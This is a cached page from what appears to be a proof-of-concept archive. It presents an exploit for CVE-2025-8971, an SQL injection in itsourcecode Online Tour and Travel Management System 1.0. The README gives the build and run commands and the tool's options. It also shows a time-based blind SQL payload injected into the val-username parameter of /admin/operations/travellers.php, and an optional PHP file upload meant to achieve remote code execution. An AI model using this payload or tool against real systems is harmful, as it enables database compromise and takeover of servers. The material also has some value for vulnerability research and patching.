Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-8971 PoC — itsourcecode Online Tour and Travel Management System 注入漏洞

Source
Associated Vulnerability
Title:itsourcecode Online Tour and Travel Management System 注入漏洞 (CVE-2025-8971)
Description:itsourcecode Online Tour and Travel Management System是itsourcecode开源的一个在线旅游与旅行管理系统。 itsourcecode Online Tour and Travel Management System 1.0版本存在注入漏洞,该漏洞源于对文件/admin/operations/travellers.php中参数val-username的错误操作导致SQL注入。
Description
Sql injection in itsourcecode Online Tour and Travel Management System 1.0.
Readme
# CVE-2025-8971 (SQL Injection)

**Author: Byte Reaper**

## Description :
This exploit   for CVE-2025-8971, a SQL injection vulnerability in itsourcecode Online Tour and Travel Management System 1.0.
The vulnerability exists in /admin/operations/travellers.php and can be exploited remotely via the val-username parameter.

How It Works

The exploit sends crafted HTTP POST requests to the target URL.

Payloads are encoded and injected into val-username.

Optional file upload (.php or image) can be used to achieve remote code execution.

The script verifies responses to check if the payload was successfully executed.

## Requirements : 
```
GCC compiler (gcc)

Linux x86_64 

ibcurl 
```


## Compilation : 
```
    gcc script.c argparse.c -o CVE-2025-8971 -lcurl
    ./CVE-2025-8971 -u http://<target> -v [verbose mode]
```

## Usage:
```
    -h, --help            help message 
    -u, --url             Target Url (BASE URL)
    -c, --cookies         File cookies
    -i, --ip              Fake Ip (Host request)
    -f, --file            File upload (.php / image)
    -v, --verbose         Verbose Mode
```
## Example Run : 
```
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....
```

## License :

MIT License
File Snapshot

[4.0K] /data/pocs/59f823a95b8acadb28e89d6196d8996905920790 ├── [1.0K] LICENSE ├── [1.6K] README.md └── [ 24K] script.c 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.